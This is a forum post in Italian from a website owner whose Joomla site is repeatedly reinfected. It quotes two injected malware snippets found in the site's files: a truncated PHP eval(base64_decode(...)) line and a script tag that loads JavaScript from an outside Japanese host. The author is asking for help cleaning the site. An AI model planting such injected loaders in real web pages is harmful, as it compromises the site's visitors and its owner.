Back to top

Autore Topic: Script malevoli: come eliminarli  (Letto 3104 volte)

Offline Griso

• Esploratore
  • **
    • Mostra profilo
Script malevoli: come eliminarli
« il: 16 Ott 2009, 18:22:55 »
Da un po' di tempo a questa parte il mio sito è attaccato da malware di ogni tipo. Dopo essere stato bannato da google che ammoniva i visitatori a visionare il sito adesso mi ritrovo con script che si inseriscono autonomamente tipo:
Codice: [Seleziona]
eval(base64_decode('aWYoIWlcut
U1RbJ2UnXSkpOw==')); ?><?php

e che ritrovo nel configuration.php nella root del dominio, nell'index.php della root e del template, nel config.php dentro la directory libraries/joomla.

Ho aggiornato Joomla all'ultima versione, ho settato il configuration.php a 400 (ma poi ritorna a 755 e non so perchè), ho cambiato la password per l'accesso FTP, ho cambiato username e password di accesso al backend di joomla, ho modificato il file admin.login presente nella cartella com_login inserendo username e password....tutto inutile.  :-\ :'( >:(

Appena ripulisco i file dopo qualche ora mi ricompare, quando va bene, il seguente script:

Codice: [Seleziona]
[quote]<script src=http://cafede.sakura.ne.jp/shibuya_staff_diary/cafe_links.php ></script>[/quote]
Il sito si vede, ma il codice è sporco!

Interrogato l'hosting americano bluexxxx.com si ostina a dire che non dipende da loro....

Che pesci prendere?
Sto impazzendo!

« Ultima modifica: 18 Ott 2009, 10:25:46 da 56francesco »

Web Design Bolzano Kreatif